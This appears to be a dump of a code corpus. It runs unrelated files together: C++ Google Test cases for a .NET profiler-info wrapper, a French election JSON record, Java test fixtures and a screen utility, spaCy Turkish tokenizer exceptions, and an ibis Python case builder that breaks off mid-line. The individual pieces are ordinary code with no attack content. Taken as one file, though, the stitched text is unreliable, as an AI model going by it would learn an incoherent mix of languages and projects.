TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_EnumModules_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, EnumModules(_))
.WillByDefault(Invoke([this](/* [out] */ ICorProfilerModuleEnum **ppEnum) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, EnumModules(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->EnumModules(nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetRuntimeInformation_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetRuntimeInformation(_, _, _, _, _, _, _, _, _))
.WillByDefault(Invoke([this](/* [out] */ USHORT *pClrInstanceId,
/* [out] */ COR_PRF_RUNTIME_TYPE *pRuntimeType,
/* [out] */ USHORT *pMajorVersion,
/* [out] */ USHORT *pMinorVersion,
/* [out] */ USHORT *pBuildNumber,
/* [out] */ USHORT *pQFEVersion,
/* [in] */ ULONG cchVersionString,
/* [out] */ ULONG *pcchVersionString,
/* [annotation][out] */
_Out_writes_to_(cchVersionString, *pcchVersionString) WCHAR szVersionString[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetRuntimeInformation(_, _, _, _, _, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetRuntimeInformation(nullptr, nullptr, nullptr, nullptr, nullptr, nullptr, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetThreadStaticAddress2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetThreadStaticAddress2(_, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classId,
/* [in] */ mdFieldDef fieldToken,
/* [in] */ AppDomainID appDomainId,
/* [in] */ ThreadID threadId,
/* [out] */ void **ppAddress) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetThreadStaticAddress2(_, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetThreadStaticAddress2(0, 0, 0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetAppDomainsContainingModule_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetAppDomainsContainingModule(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [in] */ ULONG32 cAppDomainIds,
/* [out] */ ULONG32 *pcAppDomainIds,
/* [length_is][size_is][out] */ AppDomainID appDomainIds[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetAppDomainsContainingModule(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetAppDomainsContainingModule(0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetModuleInfo2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetModuleInfo2(_, _, _, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [out] */ LPCBYTE *ppBaseLoadAddress,
/* [in] */ ULONG cchName,
/* [out] */ ULONG *pcchName,
/* [annotation][out] */
_Out_writes_to_(cchName, *pcchName) WCHAR szName[],
/* [out] */ AssemblyID *pAssemblyId,
/* [out] */ DWORD *pdwModuleFlags) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetModuleInfo2(_, _, _, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetModuleInfo2(0, nullptr, 0, nullptr, nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_EnumThreads_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, EnumThreads(_))
.WillByDefault(Invoke([this](/* [out] */ ICorProfilerThreadEnum **ppEnum) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, EnumThreads(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->EnumThreads(nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_InitializeCurrentThread_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, InitializeCurrentThread())
.WillByDefault(Invoke([this]() {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, InitializeCurrentThread()).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->InitializeCurrentThread());
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_RequestReJIT_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, RequestReJIT(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ ULONG cFunctions,
/* [size_is][in] */ ModuleID moduleIds[],
/* [size_is][in] */ mdMethodDef methodIds[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, RequestReJIT(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->RequestReJIT(0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_RequestRevert_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, RequestRevert(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ULONG cFunctions,
/* [size_is][in] */ ModuleID moduleIds[],
/* [size_is][in] */ mdMethodDef methodIds[],
/* [size_is][out] */ HRESULT status[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, RequestRevert(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->RequestRevert(0, nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetCodeInfo3_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetCodeInfo3(_, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionID,
/* [in] */ ReJITID reJitId,
/* [in] */ ULONG32 cCodeInfos,
/* [out] */ ULONG32 *pcCodeInfos,
/* [length_is][size_is][out] */ COR_PRF_CODE_INFO codeInfos[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetCodeInfo3(_, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetCodeInfo3(0, 0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetFunctionFromIP2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetFunctionFromIP2(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ LPCBYTE ip,
/* [out] */ FunctionID *pFunctionId,
/* [out] */ ReJITID *pReJitId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetFunctionFromIP2(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetFunctionFromIP2(nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetReJITIDs_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetReJITIDs(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [in] */ ULONG cReJitIds,
/* [out] */ ULONG *pcReJitIds,
/* [length_is][size_is][out] */ ReJITID reJitIds[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetReJITIDs(_, _, _, _)).Times(1);
    ASSERT_EQ(S_OK, testProfilerInfo_->GetReJITIDs(0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetILToNativeMapping2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetILToNativeMapping2(_, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [in] */ ReJITID reJitId,
/* [in] */ ULONG32 cMap,
/* [out] */ ULONG32 *pcMap,
/* [length_is][size_is][out] */ COR_DEBUG_IL_TO_NATIVE_MAP map[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetILToNativeMapping2(_, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetILToNativeMapping2(0, 0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_EnumJITedFunctions2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, EnumJITedFunctions2(_))
.WillByDefault(Invoke([this](/* [out] */ ICorProfilerFunctionEnum **ppEnum) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, EnumJITedFunctions2(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->EnumJITedFunctions2(nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetObjectSize2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetObjectSize2(_, _))
.WillByDefault(Invoke([this](/* [in] */ ObjectID objectId,
/* [out] */ SIZE_T *pcSize) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetObjectSize2(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetObjectSize2(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetEventMask2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetEventMask2(_, _))
.WillByDefault(Invoke([this](/* [out] */ DWORD *pdwEventsLow,
/* [out] */ DWORD *pdwEventsHigh) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetEventMask2(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetEventMask2(nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetEventMask2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetEventMask2(_, _))
.WillByDefault(Invoke([this](/* [in] */ DWORD dwEventsLow,
/* [in] */ DWORD dwEventsHigh) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetEventMask2(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetEventMask2(0, 0));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_EnumNgenModuleMethodsInliningThisMethod_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, EnumNgenModuleMethodsInliningThisMethod(_, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID inlinersModuleId,
/* [in] */ ModuleID inlineeModuleId,
/* [in] */ mdMethodDef inlineeMethodId,
/* [out] */ BOOL *incompleteData,
/* [out] */ ICorProfilerMethodEnum **ppEnum) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, EnumNgenModuleMethodsInliningThisMethod(_, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->EnumNgenModuleMethodsInliningThisMethod(0, 0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_ApplyMetaData_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, ApplyMetaData(_))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, ApplyMetaData(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->ApplyMetaData(0));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetInMemorySymbolsLength_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetInMemorySymbolsLength(_, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [out] */ DWORD *pCountSymbolBytes) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetInMemorySymbolsLength(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetInMemorySymbolsLength(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_ReadInMemorySymbols_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, ReadInMemorySymbols(_, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [in] */ DWORD symbolsReadOffset,
/* [out] */ BYTE *pSymbolBytes,
/* [in] */ DWORD countSymbolBytes,
/* [out] */ DWORD *pCountSymbolBytesRead) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, ReadInMemorySymbols(_, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->ReadInMemorySymbols(0, 0, nullptr, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_IsFunctionDynamic_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, IsFunctionDynamic(_, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [out] */ BOOL *isDynamic) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, IsFunctionDynamic(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->IsFunctionDynamic(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetFunctionFromIP3_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetFunctionFromIP3(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ LPCBYTE ip,
/* [out] */ FunctionID *functionId,
/* [out] */ ReJITID *pReJitId) {
return S_OK;
}));
    EXPECT_CALL(*mockProfilerInfo_, GetFunctionFromIP3(_, _, _)).Times(1);
    ASSERT_EQ(S_OK, testProfilerInfo_->GetFunctionFromIP3(nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetDynamicFunctionInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetDynamicFunctionInfo(_, _, _, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [out] */ ModuleID *moduleId,
/* [out] */ PCCOR_SIGNATURE *ppvSig,
/* [out] */ ULONG *pbSig,
/* [in] */ ULONG cchName,
/* [out] */ ULONG *pcchName,
/* [out] */ WCHAR wszName[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetDynamicFunctionInfo(_, _, _, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetDynamicFunctionInfo(0, nullptr, nullptr, nullptr, 0, nullptr, nullptr));
}
| 19,367 |
348 |
{"nom":"Champeau-en-Morvan","circ":"4ème circonscription","dpt":"Côte-d'Or","inscrits":239,"abs":114,"votants":125,"blancs":10,"nuls":7,"exp":108,"res":[{"nuance":"REM","nom":"<NAME>","voix":55},{"nuance":"LR","nom":"M. <NAME>","voix":53}]}
| 101 |
634 |
<reponame>vttranlina/james-project
/****************************************************************
* Licensed to the Apache Software Foundation (ASF) under one *
* or more contributor license agreements. See the NOTICE file *
* distributed with this work for additional information *
* regarding copyright ownership. The ASF licenses this file *
* to you under the Apache License, Version 2.0 (the *
* "License"); you may not use this file except in compliance *
* with the License. You may obtain a copy of the License at *
* *
* http://www.apache.org/licenses/LICENSE-2.0 *
* *
* Unless required by applicable law or agreed to in writing, *
* software distributed under the License is distributed on an *
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY *
* KIND, either express or implied. See the License for the *
* specific language governing permissions and limitations *
* under the License. *
****************************************************************/
package org.apache.james.filesystem.api;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.io.InputStream;
public class FileSystemFixture {
public static final FileSystem THROWING_FILE_SYSTEM = new FileSystem() {
@Override
public InputStream getResource(String url) throws IOException {
throw new UnsupportedOperationException();
}
@Override
public File getFile(String fileURL) throws FileNotFoundException {
throw new FileNotFoundException();
}
@Override
public File getBasedir() throws FileNotFoundException {
throw new UnsupportedOperationException();
}
};
public static final FileSystem CLASSPATH_FILE_SYSTEM = new FileSystem() {
@Override
public InputStream getResource(String url) throws IOException {
return ClassLoader.getSystemResourceAsStream(url);
}
@Override
public File getFile(String fileURL) throws FileNotFoundException {
return new File(ClassLoader.getSystemResource("recursive/extensions-jars").getFile());
}
@Override
public File getBasedir() throws FileNotFoundException {
throw new UnsupportedOperationException();
}
};
public static final FileSystem RECURSIVE_CLASSPATH_FILE_SYSTEM = new FileSystem() {
@Override
public InputStream getResource(String url) throws IOException {
throw new UnsupportedOperationException();
}
@Override
public File getFile(String fileURL) throws FileNotFoundException {
return new File(ClassLoader.getSystemResource("recursive/").getFile());
}
@Override
public File getBasedir() throws FileNotFoundException {
throw new UnsupportedOperationException();
}
};
}
| 1,176 |
22,040 |
import re
from ..punctuation import ALPHA_LOWER, ALPHA
from ...symbols import ORTH, NORM
_exc = {}
_abbr_period_exc = [
{ORTH: "A.B.D.", NORM: "Amerika"},
{ORTH: "Alb.", NORM: "albay"},
{ORTH: "Ank.", NORM: "Ankara"},
{ORTH: "Ar.Gör."},
{ORTH: "Arş.Gör."},
{ORTH: "Asb.", NORM: "astsubay"},
{ORTH: "Astsb.", NORM: "astsubay"},
{ORTH: "As.İz."},
{ORTH: "as.iz."},
{ORTH: "Atğm", NORM: "asteğmen"},
{ORTH: "Av.", NORM: "avukat"},
{ORTH: "Apt.", NORM: "apartmanı"},
{ORTH: "apt.", NORM: "apartmanı"},
{ORTH: "Bçvş.", NORM: "başçavuş"},
{ORTH: "bçvş.", NORM: "başçavuş"},
{ORTH: "bk.", NORM: "bakınız"},
{ORTH: "bknz.", NORM: "bakınız"},
{ORTH: "Bnb.", NORM: "binbaşı"},
{ORTH: "bnb.", NORM: "binbaşı"},
{ORTH: "Böl.", NORM: "bölümü"},
{ORTH: "böl.", NORM: "bölümü"},
{ORTH: "Bşk.", NORM: "başkanlığı"},
{ORTH: "bşk.", NORM: "başkanlığı"},
{ORTH: "Bştbp.", NORM: "baştabip"},
{ORTH: "bştbp.", NORM: "baştabip"},
{ORTH: "Bul.", NORM: "bulvarı"},
{ORTH: "bul.", NORM: "bulvarı"},
{ORTH: "Cad.", NORM: "caddesi"},
{ORTH: "cad.", NORM: "caddesi"},
{ORTH: "çev.", NORM: "çeviren"},
{ORTH: "Çvş.", NORM: "çavuş"},
{ORTH: "çvş.", NORM: "çavuş"},
{ORTH: "dak.", NORM: "dakika"},
{ORTH: "dk.", NORM: "dakika"},
{ORTH: "Doç.", NORM: "doçent"},
{ORTH: "doğ."},
{ORTH: "Dr.", NORM: "doktor"},
{ORTH: "dr.", NORM: "doktor"},
{ORTH: "drl.", NORM: "derleyen"},
{ORTH: "Dz.", NORM: "deniz"},
{ORTH: "Dz.K.K.lığı"},
{ORTH: "Dz.Kuv."},
{ORTH: "Dz.Kuv.K."},
{ORTH: "dzl.", NORM: "düzenleyen"},
{ORTH: "Ecz.", NORM: "eczanesi"},
{ORTH: "ecz.", NORM: "eczanesi"},
{ORTH: "ekon.", NORM: "ekonomi"},
{ORTH: "Fak.", NORM: "fakültesi"},
{ORTH: "Gn.", NORM: "genel"},
{ORTH: "Gnkur.", NORM: "Genelkurmay"},
{ORTH: "Gn.Kur.", NORM: "Genelkurmay"},
{ORTH: "gr.", NORM: "gram"},
{ORTH: "Hst.", NORM: "hastanesi"},
{ORTH: "hst.", NORM: "hastanesi"},
{ORTH: "Hs.Uzm."},
{ORTH: "huk.", NORM: "hukuk"},
{ORTH: "Hv.", NORM: "hava"},
{ORTH: "Hv.K.K.lığı"},
{ORTH: "Hv.Kuv."},
{ORTH: "Hv.Kuv.K."},
{ORTH: "Hz.", NORM: "hazreti"},
{ORTH: "Hz.Öz."},
{ORTH: "İng.", NORM: "ingilizce"},
{ORTH: "İst.", NORM: "İstanbul"},
{ORTH: "Jeol.", NORM: "jeoloji"},
{ORTH: "jeol.", NORM: "jeoloji"},
{ORTH: "Korg.", NORM: "korgeneral"},
{ORTH: "Kur.", NORM: "kurmay"},
{ORTH: "Kur.Bşk."},
{ORTH: "Kuv.", NORM: "kuvvetleri"},
{ORTH: "Ltd.", NORM: "limited"},
{ORTH: "ltd.", NORM: "limited"},
{ORTH: "Mah.", NORM: "mahallesi"},
{ORTH: "mah.", NORM: "mahallesi"},
{ORTH: "max.", NORM: "maksimum"},
{ORTH: "min.", NORM: "minimum"},
{ORTH: "Müh.", NORM: "mühendisliği"},
{ORTH: "müh.", NORM: "mühendisliği"},
{ORTH: "M.Ö."},
{ORTH: "M.S."},
{ORTH: "Onb.", NORM: "onbaşı"},
{ORTH: "Ord.", NORM: "ordinaryüs"},
{ORTH: "Org.", NORM: "orgeneral"},
{ORTH: "Ped.", NORM: "pedagoji"},
{ORTH: "Prof.", NORM: "profesör"},
{ORTH: "prof.", NORM: "profesör"},
{ORTH: "Sb.", NORM: "subay"},
{ORTH: "Sn.", NORM: "sayın"},
{ORTH: "sn.", NORM: "saniye"},
{ORTH: "Sok.", NORM: "sokak"},
{ORTH: "sok.", NORM: "sokak"},
{ORTH: "Şb.", NORM: "şube"},
{ORTH: "şb.", NORM: "şube"},
{ORTH: "Şti.", NORM: "şirketi"},
{ORTH: "şti.", NORM: "şirketi"},
{ORTH: "Tbp.", NORM: "tabip"},
{ORTH: "tbp.", NORM: "tabip"},
{ORTH: "T.C."},
{ORTH: "Tel.", NORM: "telefon"},
{ORTH: "tel.", NORM: "telefon"},
{ORTH: "telg.", NORM: "telgraf"},
{ORTH: "Tğm.", NORM: "teğmen"},
{ORTH: "tğm.", NORM: "teğmen"},
{ORTH: "tic.", NORM: "ticaret"},
{ORTH: "Tug.", NORM: "tugay"},
{ORTH: "Tuğg.", NORM: "tuğgeneral"},
{ORTH: "Tümg.", NORM: "tümgeneral"},
{ORTH: "Uzm.", NORM: "uzman"},
{ORTH: "Üçvş.", NORM: "üstçavuş"},
{ORTH: "Üni.", NORM: "üniversitesi"},
{ORTH: "Ütğm.", NORM: "üsteğmen"},
{ORTH: "vb."},
{ORTH: "vs.", NORM: "vesaire"},
{ORTH: "Yard.", NORM: "yardımcı"},
{ORTH: "Yar.", NORM: "yardımcı"},
{ORTH: "Yd.Sb."},
{ORTH: "Yard.Doç."},
{ORTH: "Yar.Doç."},
{ORTH: "Yb.", NORM: "yarbay"},
{ORTH: "Yrd.", NORM: "yardımcı"},
{ORTH: "Yrd.Doç."},
{ORTH: "Y.Müh."},
{ORTH: "Y.Mim."},
{ORTH: "yy.", NORM: "yüzyıl"},
]
for abbr in _abbr_period_exc:
_exc[abbr[ORTH]] = [abbr]
_abbr_exc = [
{ORTH: "AB", NORM: "Avrupa Birliği"},
{ORTH: "ABD", NORM: "Amerika"},
{ORTH: "ABS", NORM: "fren"},
{ORTH: "AOÇ"},
{ORTH: "ASKİ"},
{ORTH: "Bağ-kur", NORM: "Bağkur"},
{ORTH: "BDDK"},
{ORTH: "BJK", NORM: "Beşiktaş"},
{ORTH: "ESA", NORM: "Avrupa uzay ajansı"},
{ORTH: "FB", NORM: "Fenerbahçe"},
{ORTH: "GATA"},
{ORTH: "GS", NORM: "Galatasaray"},
{ORTH: "İSKİ"},
{ORTH: "KBB"},
{ORTH: "RTÜK", NORM: "radyo ve televizyon üst kurulu"},
{ORTH: "TBMM"},
{ORTH: "TC"},
{ORTH: "TÜİK", NORM: "Türkiye istatistik kurumu"},
{ORTH: "YÖK"},
]
for abbr in _abbr_exc:
_exc[abbr[ORTH]] = [abbr]
_num = r"[+-]?\d+([,.]\d+)*"
_ord_num = r"(\d+\.)"
_date = r"(((\d{1,2}[./-]){2})?(\d{4})|(\d{1,2}[./]\d{1,2}(\.)?))"
_dash_num = r"(([{al}\d]+/\d+)|(\d+/[{al}]))".format(al=ALPHA)
_roman_num = "M{0,3}(?:C[MD]|D?C{0,3})(?:X[CL]|L?X{0,3})(?:I[XV]|V?I{0,3})"
_roman_ord = r"({rn})\.".format(rn=_roman_num)
_time_exp = r"\d+(:\d+)*"
_inflections = r"'[{al}]+".format(al=ALPHA_LOWER)
_abbrev_inflected = r"[{a}]+\.'[{al}]+".format(a=ALPHA, al=ALPHA_LOWER)
_nums = r"(({d})|({dn})|({te})|({on})|({n})|({ro})|({rn}))({inf})?".format(
d=_date,
dn=_dash_num,
te=_time_exp,
on=_ord_num,
n=_num,
ro=_roman_ord,
rn=_roman_num,
inf=_inflections,
)
TOKENIZER_EXCEPTIONS = _exc
TOKEN_MATCH = re.compile(
r"^({abbr})|({n})$".format(n=_nums, abbr=_abbrev_inflected)
).match
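# --- Illustrative usage (added sketch; not part of the original module) ---
# TOKEN_MATCH is meant to whitelist whole tokens such as dates, clock times,
# signed numbers and apostrophe-inflected abbreviations built from the regex
# pieces above. The strings below are hypothetical inputs chosen only to
# exercise the pattern; the sketch assumes this module's globals are in scope
# (i.e. spaCy is installed so the imports at the top resolve).
if __name__ == "__main__":
    samples = ["11.06.2017", "09:15", "+3,5", "Dr.'nin", "kalem"]
    for text in samples:
        # The first four should match; a plain word like "kalem" should not.
        print(text, bool(TOKEN_MATCH(text)))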
| 3,423 |
3,442 |
<filename>src/net/java/sip/communicator/plugin/desktoputil/ScreenInformation.java
/*
* Jitsi, the OpenSource Java VoIP and Instant Messaging client.
*
* Copyright @ 2015 Atlassian Pty Ltd
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package net.java.sip.communicator.plugin.desktoputil;
import java.awt.*;
/**
* A class which reads the screen bounds and provides this information.
*
* @author <NAME>
*/
public class ScreenInformation
{
/**
* Calculates the bounding box of all available screens. This method is
* highly inaccurate when screens of different sizes are used or not evenly
* aligned. A correct implementation should generate a polygon.
*
     * @return The bounding rectangle covering all available screens.
*/
public static Rectangle getScreenBounds()
{
final GraphicsEnvironment ge = GraphicsEnvironment
.getLocalGraphicsEnvironment();
Rectangle bounds = new Rectangle();
for(GraphicsDevice gd : ge.getScreenDevices())
{
GraphicsConfiguration gc = gd.getDefaultConfiguration();
bounds = bounds.union(gc.getBounds());
}
return bounds;
}
/**
* Checks whether the top edge of the rectangle is contained in any of the
* available screens.
*
* @param window The bounding box of the window.
* @return True when the top edge is in a visible screen area; false
* otherwise
*/
public static boolean isTitleOnScreen(Rectangle window)
{
final GraphicsEnvironment ge = GraphicsEnvironment
.getLocalGraphicsEnvironment();
boolean leftInside = false;
boolean rightInside = false;
Point topLeft = new Point(window.x, window.y);
Point topRight = new Point(window.x + window.width, window.y);
for(GraphicsDevice gd : ge.getScreenDevices())
{
GraphicsConfiguration gc = gd.getDefaultConfiguration();
if(gc.getBounds().contains(topLeft))
leftInside = true;
if(gc.getBounds().contains(topRight))
rightInside = true;
if(leftInside && rightInside)
return true;
}
return leftInside && rightInside;
}
}
| 976 |
986 |
import ibis.expr.operations as ops
import ibis.expr.rules as rlz
import ibis.expr.types as ir
class TypedCaseBuilder:
__slots__ = ()
def type(self):
return rlz.highest_precedence_dtype(self.results)
def else_(self, result_expr):
"""
        Specify the result to return when no case matches.
Returns
-------
builder : CaseBuilder
"""
kwargs = {
slot: getattr(self, slot)
for slot in self.__slots__
if slot != 'default'
}
result_expr = rlz.any(result_expr)
kwargs['default'] = result_expr
# Maintain immutability
return type(self)(**kwargs)
def end(self):
default = self.default
if default is None:
default = ir.null().cast(self.type())
args = [
getattr(self, slot) for slot in self.__slots__ if slot != 'default'
]
args.append(default)
op = self.__class__.case_op(*args)
return op.to_expr()
class SimpleCaseBuilder(TypedCaseBuilder):
__slots__ = 'base', 'cases', 'results', 'default'
case_op = ops.SimpleCase
def __init__(self, base, cases=None, results=None, default=None):
self.base = base
self.cases = list(cases if cases is not None else [])
self.results = list(results if results is not None else [])
self.default = default
def when(self, case_expr, result_expr):
"""
Add a new case-result pair.
Parameters
----------
case : Expr
Expression to equality-compare with base expression. Must be
comparable with the base.
result : Expr
Value when the case predicate evaluates to true.
Returns
-------
builder : CaseBuilder
"""
case_expr = rlz.any(case_expr)
result_expr = rlz.any(result_expr)
if not rlz.comparable(self.base, case_expr):
raise TypeError(
'Base expression and passed case are not ' 'comparable'
)
cases = list(self.cases)
cases.append(case_expr)
results = list(self.results)
results.append(result_expr)
# Maintain immutability
return type(self)(self.base, cases, results, self.default)
class SearchedCaseBuilder(TypedCaseBuilder):
__slots__ = 'cases', 'results', 'default'
case_op = ops.SearchedCase
def __init__(self, cases=None, results=None, default=None):
self.cases = list(cases if cases is not None else [])
self.results = list(results if results is not None else [])
self.default = default
def when(self, case_expr, result_expr):
"""
Add a new case-result pair.
Parameters
----------
case : Expr
Expression to equality-compare with base expression. Must be
comparable with the base.
result : Expr
Value when the case predicate evaluates to true.
Returns
-------
builder : CaseBuilder
"""
case_expr = rlz.any(case_expr)
result_expr = rlz.any(result_expr)
if not isinstance(case_expr, ir.BooleanValue):
raise TypeError(case_expr)
cases = list(self.cases)
cases.append(case_expr)
results = list(self.results)
results.append(result_expr)
# Maintain immutability
return type(self)(cases, results, self.default)
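# --- Illustrative usage (added sketch; not part of the original module) ---
# The builders above accumulate (case, result) pairs immutably: each call to
# when()/else_() returns a fresh builder, and end() materialises the final
# expression (ops.SimpleCase / ops.SearchedCase under the hood). The table and
# column names below are hypothetical; the sketch assumes a working ibis
# installation in which this module is importable.
if __name__ == "__main__":
    import ibis

    t = ibis.table([("status", "int64")], name="orders")
    expr = (
        SimpleCaseBuilder(t.status)   # compare `status` against each case
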